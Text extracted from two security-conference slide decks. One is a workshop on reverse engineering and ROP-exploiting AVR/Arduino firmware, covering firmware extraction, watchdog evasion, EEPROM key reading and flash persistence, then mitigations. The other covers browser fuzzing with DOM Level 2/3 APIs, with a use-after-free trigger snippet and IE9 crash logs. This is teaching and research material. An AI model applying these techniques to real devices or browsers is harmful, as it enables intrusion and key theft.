•Vavrdisasm --https:// github.com/vsergeev/vavrdisasm
•ODAweb --https:// www.onlinedisassembler.com /odaweb / 
“Normal” disassemblers:
•IDA Pro
•Radare
IDA PRO: AVR specifics
•Incorrect AVR elf -handling
•Incorrect LPM command behavior
•Addressing issues
•Sometimes strange output
...
•However, usable, but “with care”

Radare2
•Opensource reverse engineering framework (RE, debugger, forensics)
•Crossplatform (Linux,Mac,Windows,QNX,Android,iOS , ...)
•Scripting
•A lot of Architectures / file -formats
•...
•Without habitual GUI 

Radare2. Tools
•radare2
•rabin2
•radiff2
•rafind2
•rasm2
•r2pm•rarun2
•rax2
•r2agent
•ragg2
•rahash2
•rasign2
Radare2. Using
•Install from git
# gitclone https:// github.com/radare/radare2
# cd radare2
# sys/install.sh
•Packages (yara, retdec / radeco decompilers , ...):
# r2pm -iradare2
•Console commands
# r2 -d /bin/ls –debugging
# r2 –a avrsample.bin –architecture
# r2 –b 16 sample.bin –specify register size in bits
# r2 sample.bin –iscript –include script
Radare2. Basic commands
•aaa–analyze
•axt–xrefs
•s –seek
•p –disassemble
•~ -grep
•! –run shell commands
•/ –search
•/R –search ROP
•/c –search instruction
•? –help

Radare2. Disassembling
•p?
•pd/pD-dissamble
•pi/pI–print instructions
•Examples:
> pd35 @ function

Radare2. Options
•~/.radarerc
•e asm.describe =true
•e scr.utf8=true
•e asm.midflags =true
•e asm.emu =true
•eco solarized

Radare2. Interfaces
•ASCII –VV
•Visual panels –V! (vim like controls)
•Web -server –r2 -c=H file
•Bokken 

Training kit contentAVR JTAG mkI
Atmega128 custom
devboardESP8266 “ WiFi to serial”Arduino ( not included)
Part 2 : Pre -exploitation
You have a device. First steps?
Decide 
what you 
wantDetermine 
target 
platformSearch for 
I/O 
point(s)Search for 
debug 
point(s)Acquire 
the 
firmwareFuzz 
and/or 
static 
analysis
Let’s start with a REAL example
•Let’s use training kit board as an example. 
•Imagine that you know nothing about it
•We will go through all steps, one by one
What we want?
At first, decide what you want:
•Abuse functionality
•Read something from EEPROM/Flash/SRAM
•Stay persistantComplexity
Determine target platform
•Look at the board and search for all ICs ...
Atmega128 16AUCP2102
ESP8266EX
Digikey /Octopart /Google ...
Search for I/O(s)
USB
AntennaUARTExternal connectors
External connectors
Search for I/O(s): tools
Jtagulator
Bus pirateSaleae logic analyzer Arduino

Search for debug interface(s)
ISP
JTAG
Search for debug interface(s): tools
JtagulatorArduino + JTAGEnumOr cheaper

JTAGEnum against 
Atmega128 demoboard

Search for debug & I/O: real device
EthernetButton
LEDsConnector ICS bus
2 JTAGs
ISPs
Acquire the firmware
•From vendor web -site 
•Sniffing the update process
•From device
Acquire the firmware: sniff it!

Acquire the firmware: JTAG or ISP
•Use JTAG or ISP programmer to connect to the board debug ports
•Use:
•Atmel Studio
•AVRDude
•Programmer -specific software to read flash
$ avrdude -p m128 -c jtagmkI –P /dev/ttyUSB0 \
-U flash:r:”/home/ avr/flash.bin ":r
Acquire the firmware: lock bits
•AVR has lock bits that protects device from extracting flash
•Removing this lockbits will erase entire device
•If you have them set, you’re not lucky, try to get firmware from other 
sources 
•However, if you have lock bits set, but JTAG is enabled you could try partial 
restoration of firmware with avarice –capture (rare case)

Real hardware
•Read fuses and lock bits using avarice –r
•Acquire firmware using avrdudeExercise 2.0: Acquire!

Firmware reversing: formats
•Raw binary format
•ELF format for AVRs
•Intel HEX format (often used by programmers)
•Could be easily converted between with avr-objcopy , e.g.:
avr-objcopy -R .eeprom-O ihextest.elf “test.hex "
Real hardware & Simulator
cd /home/ radare/workshop/ex2.1
avr-objcopy –I ihex–O binary ex2.1.hex ex2.1.bin
r2 –a avrex2.1.binEx 2.1: Hello! RE

Arithmetic instructions
add r1,r2 ; r1  = r1 + r2
add r28,r28 ; r28 = r28 + r28
and r2,r3 ; r2  = r2 & r3
clr r18 ; r18 = 0
inc r0 ; r0  = r0 + 1
neg r0 ; r0  = -r0
...
Bit manipulation instructions
lsl r0 ; r0 << 2 
lsr r1 ; r1 >> 2 
rol r15 ; cyclic shift r16 bits to the 
left 
ror r16 ; cyclic shift r16 bits to the 
right
cbr r18,1 ; clearbit1 in r18
sbr r16, 3 ; set bits 0 and 1 in r16
cbi $16, 1 ; PORTB[1] = 0
Memory manipulation
mov r1, r2 ; r1 = r2
ldi r0, 10 ; r0 = 10
lds r2,$FA00 ; r2 = *0xFA00
sts $FA00,r0 ; *0xFA00 = r0
st Z, r0 ; *Z(r31:r30) = r0
st –Z, r1 ; *Z--= r0
std Z+5, r2 ; *(Z+5) = r2
in r15, $16 ; r15 = PORTB
out $16, r0 ; PORTB = r0
...Same 
for LD*
Memory manipulation: stack
push r14 ; save r14 on the Stack
pop r15 ; pop top of Stack to r15SP = SP -1
SP = SP + 1
Memory manipulation: flash
lpmr16, Z ; r16 = *(r31:r30), but fromflash
Note: code is separated from data

Unconditional jump/call
jmp $ABC1 ; PC = 0xABC1
rjmp 5 ; PC = PC + 5 + 1
call $ABC1 ; “push PC+2”
; jmp$ABC
ret ; “pop PC”
Harvard architecture? But PC goes to DATA 
memory

SREG –8-bit status register
C –Carry flag
Z –Zero flag
N –Negative flag
V –two’s complement oVerflowindicator 
S –N⊕V, for Signed tests
H –Half carry flag
T –Transfer bit (BLD/BST)
I –global Interrupt enable/disable flag
Conditional jump
cpse r1, r0 ; r1 == r2 ? 
PC ← PC + 2 : PC ← PC + 3
breq 10 ; Z ? PC ← PC + 1 + 10
brne 11 ; !Z ? PC ← PC + 1 + 10
... 
SREG manipulations
•sec/clc–set/clear carry
•sei/cli –set/clear global interruption flag
•se*/cl* –set/clear * flag in SRGE
Special
•break –debugger break
•nop –no operation
•sleep –enter sleep mode
•wdr –watchdog reset
Real hardware & Simulator
cd /home/ radare/workshop/ex2.1
avr-objcopy –I ihex–O binary blink.hex blink.bin
r2 –a avrex2.1.binEx 2.2: Blink! RE
Questions:
1.Identify main() function and describe it using af
2.Find the LED switching command
3.What type of delay is used and why accurate frequency is required?
4.Locate interrupt vector and initcode, explain what happens inside initcode.
Reversing: function szignatures
•Most of firmwares contains zero or little strings.
•How to start?
•Use function signatures.
•However, in AVR world signatures may be to vary.
•Be prepared to predict target compiler/library/RTOS and options... or 
bruteforce it.
•In R2, signatures are called zignatures .
Embedded code priorities
•Size
•Speed
•Hardware limits
•Redundancy
•...
•...
•...
•...
•Security
Fuzzing specifics
•Fuzzing is Fuzzing. Everywhere.
•But... we’re in embedded world.
•Sometimes you could detect crash through test/debug UART or pins
•In most cases, you could detect crash only by noticing, that device is 
no longer response
•Moreover, watchdog timer will could limit your detection capabilities, 
because it will reset device.
•So how to detect crash?
Fuzzing: ways to detect crash
•JTAG debugger –break on RESET
•External analysis of functionality –detect execution pauses
•Detect bootloader /initialization code (e.g. for SRAM) behavior with 
logic analyzer and/or FPGA
•Detect power consumption change with oscilloscope/DAQ

Sometimes Arduino is enough to detect 
•I2Cand SPI initsequencies could be captured by Arduino GPIOs
•If bootloader is slow and waits ~1 second, this power consumption 
reduction could be reliably detected with cheap current sensor, e.g.: 
SparkFun Low Current Sensor Breakout -ACS712
https ://www.sparkfun.com /products /8883+

Let’s proof it.

Part 3: Exploitation
Quick intro to ROP -chains
•Return Oriented Programming
•Series of function returns
•We’re searching for primitives (“gadgets”) ending with ‘ret’ that could 
be transformed into useful chain
•SP is our new PC
Notice: Arduino
•The next examples/exercises will be based upon Arduio ‘libc’ (in fact, 
Non-GNU AVR libc+ Arduino wiring libs)
•We’re using Arduino because it’s complex, full of gadgets but free 
(against IAR or CV which are also complex and full of gadgets) 
•Also, Arduino is fairly popular today, due to enormous number of 
libraries and “quick start” (e.g. quick bugs)

Real hardware
cd /home/ radare/workshop/ex3.1
avarice --mkI--jtag/dev/ttyUSB0 -p -e --file build -crumbuino128/ex3.1.hex -g :4242
avr-gdb
Simulator
cd /home/ radare/workshop/ex3.1_simulator
simulavr -P atmega128 -F 16000000 –f build-crumbuino128/ex3.1.elf
avr-gdb
Or:node exploit.jsEx 3.1 –3.3
Example 3.1: Abusing 
functionality: ret to function

Internal -SRAM only memory map
http ://www.atmel.com /webdoc /AVRLibcReferenceManual /malloc_1malloc_intro.htmlOverflowing the heap => Rewriting the stack!

How to connect data(string/binary) to code?
Standard model: with .data 
variables
•Determine data offset in flash
•Find initcode/firmware prologue where 
.data is copied to SRAM
•Using debugging or brain calculate offset of 
data in SRAM
•Search code for this addressEconomy model: direct read with 
lpm/elpm
•Determine data offset in flash
•Search code with *lpm addressing to this offset
ABI, Types and frame layouts (GCC)
•Types: standard (short == int== 2, long == 4, except for double (4))
•Intcould be 8bit if -mint8 option is enforced.
•Call-used: R18–R27, R30, R31
•Call-saved : R2–R17, R28, R29
•R29:R28 used as frame pointer
•Frame layout after function prologue:
incoming arguments
return address
saved registers
stack slots, Y+1 points at the bottom
Calling convention: arguments
•An argument is passed either completely in registers or completely in memory.
•To find the register where a function argument is passed, initialize the register 
number Rnwith R26 and follow this procedure:
1.If the argument size is an odd number of bytes, round up the size to the next even number.
2.Subtract the rounded size from the register number Rn.
3.If the new Rnis at least R18 and the size of the object is non -zero, then the low -byte of the argument is 
passed in Rn. Other bytes will be passed in Rn+1,Rn+2, etc.
4.If the new register number Rnis smaller than R18 or the size of the argument is zero, the argument will 
be passed in memory.
5.If the current argument is passed in memory, stop the procedure: All subsequent arguments will also 
be passed in memory.
6.If there are arguments left, goto 1. and proceed with the next argument .
•Varagrs are passed on the stack. 
Calling conventions: returns
•Return values with a size of 1 byte up to and including a size of 8 
bytes will be returned in registers. 
•For example , an 8 -bit value is returned in R24 and an 32 -bit value is 
returned R22...R25.
•Return values whose size is outside that range will be returned in 
memory.
Example
For
intfunc(chara,longb);
•a will be passed in R24.
•b will be passed in R20, R21, R22 and R23 with the LSB in R20 and the 
MSB in R23.
•the result is returned in R24 (LSB) and R25 (MSB).
Example 3.2: Abusing 
functionality: simple ROP

ROP gadget sources
•User functions
•“Standard” or RTOS functions
•Data segment 
•Bootloader section
More code => more gadgets
ROP chain size
•It’s MCU
•SRAM is small
•SRAM is divided between register file, heap and stack
•Stack size is small
•We’re low on chain size
•Obviously, you will be limited with 20 -40 bytes (~15 -30 gadgets)
•However it all depends on compiler and memory model
http ://www.atmel.com /webdoc /AVRLibcReferenceManual /malloc_1malloc_tunables.html
Memory maps –external SRAM/separated stack

Memory maps –external SRAM/mixed stack

Detecting “standard” functions
•In AVR we have bunch of compilers, libraries and even RToSes
•So, “standard” function could be vary.
•More bad news: memory model and optimization options could 
change function.
•The best approach is try to detect functions like malloc /str(n)cpyand 
then find the exact compiler/options that generates such code
•After it, use function signatures to restore the rest of the code
•In Radare2, you could use zignatures or Yara .
Example 3.3: more complex 
ROP

Exercise 3.1: ret 2 function
build exploit that starts with ABC but calls switchgreen () function

Exercise 3.3: print something 
else
3.3.1) build exploit that prints “a few seconds ...”
3.3.2 (homework) build exploit that prints “blink a few seconds...”

Real hardware
cd /home/ radare/workshop/ex3.1
in Blink.ino change APNAME constant from “esp_123” to “esp_your3digitnumber” 
make
avr-objdump –I ihex–O binary build -crumbuino128/ex3.4.hex ex3.4.bin
avarice --mkI--jtag/dev/ttyUSB0 -p -e --file build-crumbuino128/ex3.4.hex -g :4242
avr-gdb
Connect to “esp_your3digitnumber” and type http://192.168.4.1 in your browser
Simulator
cd /home/ radare/workshop/ex3.4_simulator
On 1stterminal:node exploit.js
On 2ndterminal :tail –f serial1.txt
In your browser: http://127.0.0.1:5000Ex 3.4
Example 3.4: Blinking 
through HTTP GET

Exercise 3.4: UARTing
through HTTP query

Exercise 3.5: Blinking 
through HTTP Post

It’s possible to construct ROP with debugger...
...But if I don’t have some, how I could 
determine the overflow point ?
•Reverse and use external analysis to find function that 
overflows
•Bruteforce it!
Arduino blink (ROP without 
debugger)

Part 4: Post -exploitation
&& Tricks
What do we want? (again)
•Evade watchdog
•Work with persistent memory (EEPROM and Flash)
•Stay persistent in device
•Control device for a long time
Evade the watchdog
In most cases, there three ways:
1.Find a ROP with WDR and periodically jump to it.
2.Find watchdog disable code and try to jump to it.
3.Construct watchdog disable code over watchdog enable code.
Set r18 to 0 and JMP here
Fun and scary things to do with memory ...
•Read/write EEPROM (and extract cryptography keys)
•Read parts of flash (e.g., reading locked bootloader section) –could 
be more useful than it seems
•Staying persistent (writing flash)

Reading EEPROM/Flash
•Ok, in most cases it’s almost easy to find gadget(s) that reads byte 
from EEPROM or flash and stores it somewhere.
•We could send it back over UART or any external channel gadgets
•Not always possible, but there are good chances
Writing flash
•Writing flash is locked during normal program execution
•However, if you use “jump -to-bootloader ” trick, you could write flash 
from bootloader sections.
•To do this, you need bootloader of that has enough gadgets.
•However, modern bootloaders are big and sometimes you could be 
lucky (e.g. Arduino bootloader )
•Remember to disable interrupts before jumping to bootloader .
“Infinite -ROP” trick*
1.Set array to some “upper” stack address (A1) and N to some value 
(128/256/ etc) and JMP to read(..)
2.Output ROP -chain from UART to A1. 
3.Set SPH/SPL to A1 (gadgets could be got from initcode)
4.JMP to RET.
5.???
6.Profit!
Don’t forget to include 1 and 3 -4 gadgets in the ROP -chain that you are 
sending by UART.
*Possible on firmwares with read(array, N) from UART functions and complex initcode
Mitigations

Mitigations (software)
•Safe code/Don’t trust external data (read 24 deadly sins of computer 
security)
•Reduce code size (less code -> less ROP gadgets)
•Use rjmp/jmp instead of call/ret (ofc, it won’t save you from ret2 
function)
•Use “inconvenient” memory models with small stack 
•Use stack canaries in your RTOS
•Limit external libraries
•Use watchdogs
•Periodically check stack limits (to avoid stack expansion tricks)
Mitigations (hardware)
•Disable JTAG/debuggers/ etc, remove pins/wires of JTAG/ISP/UART
•Write lock bits to 0/0
•Use multilayered PCBs
•Use external/hardware watchdogs
•Use new ICs (more secure against various hardware attacks)
•Use external safety controls/processors
And last, but not least:
•Beware of Dmitry Nedospasov ;)
Part 4: Post -exploitation
&& Tricks
Conclusions
•RCE on embedded systems isn’t so hard as it seems.
•Abusing of functionality is the main consequence of such attacks
•However, more scary things like extracting cipherkeys or rewriting the 
flash is possible
•When developing embedded system remember that security also 
should be part of the Software DLC process.
Books/links
•Белов А.В .Разработка устройств на микроконтроллерах AVR
•Atmega128 disasm thread: http://www.avrfreaks.net/forum/disassembly -atmega128 -bin-file
•Exploiting buffer overflows on arduino : http://electronics.stackexchange.com/questions/78880/exploiting -
stack -buffer -overflows -on-an-arduino
•Code Injection Attacks on Harvard -Architecture Devices: http://arxiv.org/pdf/0901.3482.pdf
•Buffer overflow attack on an Atmega2560: http://www.avrfreaks.net/forum/buffer -overflow -attack -
atmega2560?page=all
•Jump to bootloader : http://www.avrfreaks.net/forum/jump -bootloader -app-help -needed
•AVR Libc reference manual: 
http://www.atmel.com/webdoc/AVRLibcReferenceManual/overview_1overview_avr -libc.html
•AVR GCC calling conventions: https:// gcc.gnu.org/wiki/avr -gcc
•Travis Goodspeed , Nifty Tricks and Sage Advice for Shellcode on Embedded Systems : 
https://conference.hitb.org/hitbsecconf2013ams/materials/D1T1%20 -%20Travis%20Goodspeed%20 -
%20Nifty%20Tricks%20and%20Sage%20Advice%20for%20Shellcode%20on%20Embedded%20Systems.pdf
•Pandora’s Cash Box: The Ghost Under Your POS: https:// recon.cx/2015/slides/recon2015 -17-nitay -
artenstein -shift -reduce -Pandora -s-Cash -Box-The-Ghost -Under -Your -POS.pdf

Radare2. Links
•http:// radare.org
•https:// github.com/pwntester/cheatsheets/blob/master/radare2.
md
•https ://www.gitbook.com/book/radare/radare2book/details
•https://github.com/radare/radare2ida
Any Q?
@dark_k3y
@dukeBarman
http:// radare.org /r/
http:// dsec.ru http:// eltech.ru http:// zorsecurity.ru

Now it’s CTF time! 
Taking Browsers Fuzzing
ToThe Next (DOM) Level 
(or “ How to leverage on W3C specifications to unleash a 
can of worms ”) 
Rosario Valotta 

Agenda
•Browser fuzzing: state of the art 
•Memory corruption bugs: an overview 
•Fuzzing techniques using DOM Level 1
•Fuzzing at DOM Level 2
•Fuzzing at DOM Level 3
•Introducing Nduja fuzzer 
•Analysis of fuzzing results 
•Crashes use cases analysis 
•Conclusions 
Me, myself and I 
•Day time - IT professional working in a mobile telco compa ny 
•Nigth time –deceive insomnia practicing web security 
•Independent researcher /occasional speaker/ bug hunter : 
–Cookiejacking –Cross domain cookie theft for IE 
–Nduja Connection –first ever cross domain XSS worm 
–Critical Path Memova webmail XSS-CSRF : 40 millions vulne rable accounts 
worldwide 
–Twitter XSS Worm (one of the many)
–Outlook Web Access CSRF 
–Information gathering through Windows Media Player 
https://sites.google.com/site/tentacoloviola/ 
Browser fuzzing : state of the art
•Probably the most common technique to discover bugs/vuln erabilities in browsers 
•Best of the breed:
–Mangleme (2004 - M.Zalewski): mainly concerned on HTML t ags fuzzing 
–Crossfuzz (2011 - M.Zalewski)
•Crossfuzz: 
–stresses memory management routines building circular r eferences among DOM elements 
–helped uncover more than 100 bugs in all mainstream brows ers (IE, FF, CM, SF) 
–Many modded versions 
–Widespread coverage: spotting new bugs using lookalike al gorithms is really hard!!! 
•Valuable tools/frameworks:
–Grinder by Stephen Fewer 
–Bf3 by Krakowlabs 
What’s the big whoop ?
Memorycorruptionbugs.
Memory corruption bugs: 
exploitability
Exploitability !READ AV on EIP Several WRITE 
AV /GS and NX(DEP) 
related AV Read AV like: MOV EAX ECX . . . Call EAX 
|| || || 
&& 
Memory address causing the AV is attacker controllable 
Memory corruption bugs: UAFs
•Use after free errors occur when a program reference s a memory 
location after it has been freed 
•Referencing freed memory can led to unpredictable c onsequences: 
–Losing  of data integrity 
–Denial of service: accessing freed memory can lead to crashes 
–Controls of program flow: can lead to arbitrary code  execution 
BAADF00D 
ABCDABCD 
DDDDDDDD 
FEEEFEEE ptr=malloc(8); HeapAlloc() 
free(ptr); 
gc() •Who performs a free() operation should ensure that all pointers  pointing to 
that memory area are set 
to NULL 
•The utilization of multiple or complex data structures and the presence of cross references can make this operation really hard!
UAF: a simple example
•Real life example (Android 2.1 Webkit Browser) 
<body> <textarea id="target" rows=20> blablabla </textarea></body> 
var elem1 = document.getElementsByTagName("textarea" ) 
var elem2 = document.getElementById("target") 
elem2.parentNode.removeChild(target ); 
var s = new String(” \u41414141”); 
for(var i=0; i<20000; i++) s+=” \u41414141”; 
elem1.innerHtml=s; vtable textarea 
textarea elem1 elem2 . . . . . . 
textarea elem1 elem2 NULL 
NULL vtable . . . . . . 
textarea elem1 elem2 NULL 
NULL 
41414141 41414141 feeefeee feeefeee 
s
Memory corruption bugs: double
frees
•Double free errors occur when free() is called more than once with the 
same memory address as an argument. 
•A reference to the freed chunk occurs twice in a Fre e List: 
•After a malloc() statement following double frees: 
–the first occurrence of our chunk  is deleted from the Free List and used for 
user allocation 
–Second occurrence  of our chunk still in the free l ist... 
–Free list corruption is possible (but not easily exploitable... )! 2XU FKXQN SWU 6RPHRWKHU 
FKXQN 2XU FKXQN SWU 
r UHIHUHQFH6RPHRWKHU 
FKXQN 
EOLQN IOLQN 
EOLQN IOLQN 
EOLQN IOLQN 
6L]H RI SUHYLRXV FKXQN 
6L]H RI FXUUHQW FKXQN 
8VHU DOORFDWHG GDWD 6L]H RI SUHYLRXV FKXQN 
6L]H RI FXUUHQW FKXQN 
8QXVHG VSDFH )ZG SWU WR QH[W FKXQN LQOLVW 
%NG SWU WR SUHYLRXV FKXQN LQOLVW $OORFDWHG YLHZ )UHHOLVW YLHZ FKXQN 
PHP 
Fuzzing at DOM level 1
•The common approach in browser fuzzing leverages on D OM Level 1 
interfaces for performing DOM mutations 
1. random HTML elements are created and randomly add ed to the HTML document tree 
2. the DOM tree is crawled and elements references ar e collected 
3. elements attributes and function calls  are tweak ed 
4. random DOM nodes are deleted 5. garbage collection is forced 6. the collected references are crawled and tweaked a gain 
•Effective but  some limitations: 
–every DOM mutation is performed on a single HTML el ement,  no mass mutations 
–quite static: execution flow can only be altered by  the number and  the type of randomly 
generated DOM nodes (e.g different tag names, attrib utes, etc) 
•The entropy of a browser fuzzer can be taken to a fur ther level 
introducing some new functionalities defined in DOM Level 2 and Level 3 
specifications. 
What’s newin DOM level 2?
•DOM Level 2 specifications introduces several interfaces that allows to perform mutations on 
collections of DOM 
elements
•Allow to create logical aggregations of nodes and execute CRUD mutations on them using a rich set of APIs 
•These operations can be 
viewed as convenience methods that enable a browser implementation to optimize common editing patterns 
Ranges 
createRange 
deleteContents 
extractContents 
cloneRange 
removeRange 
. . . 
Document Fragment 
cloneNode 
normalize 
querySelectorA 
ll 
replaceChild 
. . . 
TextRange 
pasteHTML 
collapse 
expand 
execCommand 
. . . 
SelectionRan 
ge 
addRange 
deleteFromDocu 
ment 
removeRange 
Collapse 
. . . 
What’s newin DOM level 2? (cont.ed )
DOM Level 2 also defines some interfaces for performing selective 
traversal of a document's 
contents 
These data structures can be 
used to create logical views 
of a Document subtree
TreeWalker 
firstChild 
lastChild 
nextNode 
previousNode 
nextSiebling 
previousSiebling 
NodeIterator 
detach 
nextNode 
previousNode 
NodeFilter 
Working withRanges (1/4) 
<BODY> <H1>Title</H1><P>Sa mple</P></BODY> 
R=document.createRange(); b=document.body; R.setStart(document.body, 
0); 
R.setEnd(document.getElementsByTagName (“P”)[0]. childNodes[0], 2); 
5DQJH FUHDWLRQ 
Working withRanges (2/4) 
<BODY><DIV><TABLE><TR><TD> aaaa<TD>bbbb</TR></TABLE><P>cccc</P> </ 
DIV> r=document.createRange(); 
r.setStart(document.getElementsByTagName("TD")[0],0 ); 
r.setEnd(document.getElementsByTagName("DIV")[0],2) ; 
r.deleteContents() 
5DQJH GHOHWLRQ 
BODY 
DIV 
TABLE 
TR 
TD 
aaaa 
TD 
bbbb 
P
cccc 
BODY 
DIV 
TABLE 
TR 
TD 
aaaa 
Working withRanges (3/4) 
n=document.createElement(“P”); n.appendChild(document.createTextNode (“ Hi ”)); 
r.insertNode(n); 
<BODY> <P>Hi</P> <H1>Title</H1><P>Sa mple</P></BODY> 
/* If n is a DocumentFragment or the root of a subtree th e 
whole content is added to the range */ 
,QVHUW 1RGH 
Our Range 
 Appended node 
Working withRanges (4/4)
n=document.createElement(“DIV”); n.appendChild(document.createTextNode (“ Hi ”)); 
r.surroundContents(n); <BODY><H1>Title</H1> 
<P>Sample</P> </BODY> 
<BODY><H1>Title</H1> <DIV>Hi <P>Sample</P> </DIV> </BODY> 
/*range surrounding can be decomposed in: extractContents+insertNode+appendChild */ 
6RUURXQGLQJ UDQJH 
3goodreasons tofuzzwithRanges
•Complexity: browsers need to keep consistency of DOM structure  
and HTML syntax across mutations --> as DOM is modi fied, the 
Ranges within need to be updated 
•Complexity: worst case massive mutation is made up of 4 method s --> 
deleteContents() - insertNode() - splitText() - normal ize() 
•Complexity: lot of pointers adjustments need to be done 
(anchestors, sieblings, parent, etc)
Similar observations also work for DocumentFragment, TextRange and SelectionRange 
WTFuzz ???
Each of the methods 
provided for the 
insertion, deletion and copying of contents should 
be directly mapped to a 
series of atomic node editing operations provided by DOM 
Core 
. Implementation bugs in these 
methods can lead to memory 
corruption bugs when massive mutation occurring 
on DOM are not correctly 
mapped to atomic-safe node operations. EXPECTATIONS SAD REALITY 
DOM level 2 logical views
•NodeIterators and TreeWalker are two different ways of  
representing a logical view of  the nodes of a docum ent subtree 
NodeIterators 
oFlattened representation of the document subtree 
oNo hierarchy, only backward and 
forward navigation allowed TreeWalker 
oMaintains hierarchical relationships of 
the subtree 
oSubtree can be navigated using common methods provided by DOM interfaces 
HTML 
HEAD 
TITLE 
BODY 
DIV 
TABLE 
BODY DIV TABLE 
BODY 
DIV 
TABLE 
Working withDOM level 2 logical 
views
•NodeFilters allow the user to create objects that "f ilter out" nodes. Each filter 
contains a function that determines whether or not a  node should be presented as 
part of the traversal's logical view of the document . ni = document.createNodeIterator(document.body, Node Filter.SHOW_ALL, null, false); 
while (Node n = ni.nextNode())  doSomething(n); 
tw = document. createTreeWalker(document.body, NodeF ilter.SHOW_ALL, null, false); 
for (Node child=tw.firstChild(); child!=null; child =tw.nextSibling()) { 
doSomething(tw); } 
class NamedAnchorFilter implements NodeFilter { 
short acceptNode (Node n) { 
. . . if <USER_DEFINED_CONDITION> return FILTER_SKIP ; 
if <SOME_OTHER_CONDITION> return FILTER_ACCEPT ;
} return FILTER_SKIP; } 
}
WTFuzz ??? (strikes back... )
•NodeIterators and TreeWalkers are dynamic: they change   to reflect 
mutations of  the underlying document. 
•Lot of pointer arithmetic to maintain consistency b etween DOM and logical 
views when mutations occur 
•Logical views are also influenced by dynamic changes  on NodeFilters 
•Scenario (simultaneus events) : 
•Memory corruption scenarios arise when DOM mutations  performed on the 
physical tree are not correctly managed on the logi cal counterpart BODY DIV TABLE 
Is being deleted Ni.currentNode() A new Filter defines SKIP 
on TABLE elements 
Introducing events (DOM level 3) 
•DOM Level 3 specification defines a standard way to  create 
events, fire them and manage event listeners for ev ery DOM node 
•Many event types are specified, MutationEvents are particularly 
interesting: 
oDOMNodeInterted, DOMNodeRemoved, DOMSubtreeModified , etc 
someElement.addEventListener (“ DOMNodeRemoved ”, myRoutine, false); 
someElement.removeEventListener (“ DOMNodeRemoved ”, myRoutine, false); 
•Every node has a map of installed listeners and han dlers, keyed by 
event type 
BODY 
DIV 
TABLE 
•Listener #1 
•...
•Listener #N 
•Listener #1 
•...
•Listener #N DOMNodeInserted 
•Handler#1 
•...
•Handler#N DOMNodeRemoved 
•Handler#1 
•...
•Handler#N 
/LVWHQHUV IRU 7$%/(HOHPHQW 
Function myhandler(){ blahblahblah blahblahblah 
blahblahblah 
}
(YHQW KDQGOHU FRGH 
Event dispatching model 
•Events dispatching can be synchronous or asynchrono us: 
–Synch: don’t use the event queue : immediately  man aged even when inside other 
handlers 
–Asynch: put in the Event queue whenever they fire an d managed in the browser 
Event loop 
•Event objects are dispatched to an event target 
•At the beginning of the dispatch, browsers must first determine the 
event object's propagation path 
–an ordered list of DOM nodes through which the event object must pass 
–must reflect the hierarchical tree structure of the document 
•The propagation path of an event includes 3 phases:
–capture phase : from the document root to the  target's parent 
–target phase : the event arrives at the final target element 
–bubble phase : from the target's ancestor, in reverse order, to  the document root 
element 
Event propagation sample

Event dispatching model (cont.ed )
Identify event.target 
Capture phase 
(for each event.target 
anchestors )
Target Phase 
Bubble phase 
(for each event.target 
anchestors )Calculate 
propagation path Check if  some 
handlers are defined  
on the node for the 
event Invoke event 
handler 
Calculate 
propagation path Invoke event 
handler for event 
target 
Calculate 
propagation path Check if  some 
handlers are defined  
on the node for the 
event Invoke event 
handler 
WTFuzz ??? (on again... )
•The listeners map of a node can be altered during d ispatch, but is 
immutable once the dispatch reached that node 
•Once determined, the propagation path must not be c hanged, even if an 
element in the propagation path is moved/removed wit hin the DOM 
Mutation Events are synchronous What if: listeners map for a node is modified (add or Remove EventListener)  
after the event propagation has reached the node? What if: a DOM mutation occurs on a node belonging to the pr opagation path? 
What if  the mutation causes a non continuable propa gation? 
What if: a “synchronous ”  Mutation Event is fired in the middle of a Mutation Ev ent 
handler routine? 
Introducing Nduja
Fat 
33%
Pepper 
33%Pork 
33%1% ??? A spicy, spreadable salami 
made in Calabria, my 
hometown 
Not sure you want to know the trailing 1%...
Introducing Nduja
DOM node 
collections 
33%
DOM logical 
views 
33%DOM Events 
33 %1% ??? •...also a fuzzer prototype written in JS 
–Heavily leverages on DOM Level 2 and DOM Level 3  APIs 
–Several versions implemented with slightly different algor ithms 
•Used Grinder 0.3 as a framework to collect/classify/repro duce crashes 
I’ll sell my secret 
for a pint... 
Nduja : fuzzing algorithm
Create random 
document tree Create DOM 
logical views 
(NodeIterator, T
reeWalker)
Crawl DOM tree Create random 
RANGE and 
perform random 
mutation on it Initialization 
Crawling 
Event handling Crawl logical 
views 
(next,previous,pa 
rent, child)Add random 
Mutation Events 
listener for each 
node 
Create random 
RANGE and 
perform random 
mutation on it Crawl logical 
views 
(next,previous,pa 
rent, child)Remove random 
Mutation Events 
listener for 
current target 
Add random 
Mutation Events 
listener for 
event target 
(
Capture/Bubble 
Target 
I
1
2
Nduja : results overview
•Internet Explorer 9 
–Heavily crashes 
–70 unique crash hashes identified 
–15 reproducible memory corruption bugs identified 
–crashes mainly due to UAFs and DFs 
–three 0-days identified (disclosed to MSFT) 
–some other will be privately disclosed 
–Many other likely0-days (PoC missing yet..) 
•Internet Explorer 10 
–Most of crashes occurring on IE9 also happen on IE10 
•Chrome 21 
–A bunch of ReadAVs and Stack Overflows found 
–Still running ;-)
Crash use case I 
eax=44004400 ebx=045dffff ecx=44004400 edx=0000001b esi=045dffff edi=026bc708 
eip=661328ec esp=026bc5d4 ebp=026bc5dc iopl=0         nv up ei pl nz na pe nc 
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=000 0             efl=00010206 
MSHTML!NotifyElement+0x33: 661328ec 8b11            
mov edx,dword ptr [ecx]  ds:0023:44004400=???????? 
.. . 
EXCEPTION_LEVEL:SECOND_CHANCE 
EXCEPTION_TYPE:STATUS_ACCESS_VIOLATION EXCEPTION_SUBTYPE:READ FAULTING_INSTRUCTION:661328ec mov edx,dword ptr [ecx]BASIC_BLOCK_INSTRUCTION_COUNT:4 BASIC_BLOCK_INSTRUCTION:661328ec mov edx,dword ptr [ec x]
BASIC_BLOCK_INSTRUCTION_TAINTED_INPUT_OPERAND:ecx BASIC_BLOCK_INSTRUCTION:661328ee 
mov eax,dword ptr [edx+8] 
BASIC_BLOCK_INSTRUCTION_TAINTED_INPUT_OPERAND:edx BASIC_BLOCK_INSTRUCTION:661328f1 push edi BASIC_BLOCK_INSTRUCTION:661328f2 
call eax 
. . . STACK_FRAME:MSHTML!NotifyElement+0x33 
STACK_FRAME:MSHTML!CMarkup::SendNotification+0x5b 
STACK_FRAME:MSHTML!CMarkup::Notify+0x102 
